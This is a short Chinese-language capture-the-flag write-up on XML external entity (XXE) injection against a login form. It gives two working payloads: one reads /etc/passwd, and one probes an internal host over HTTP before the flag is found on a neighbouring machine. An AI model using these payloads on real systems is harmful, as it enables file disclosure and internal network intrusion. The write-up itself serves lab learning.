知識點
- XXE探測內網
一如既往的登錄框

抓包,添加外部注入實體,讀取/etc/passwd
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///etc/passwd"> ]> <user><username>&admin;</username><password>123546</password></user>

讀取歷史操作命令.bash_history失敗
讀取/etc/hosts文件

看到內網有存活的主機,嘗試訪問
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY admin SYSTEM "http://173.241.204.10"> ]> <user><username>&admin;</username><password>123546</password></user>

在173.241.204.11主機處發現flag

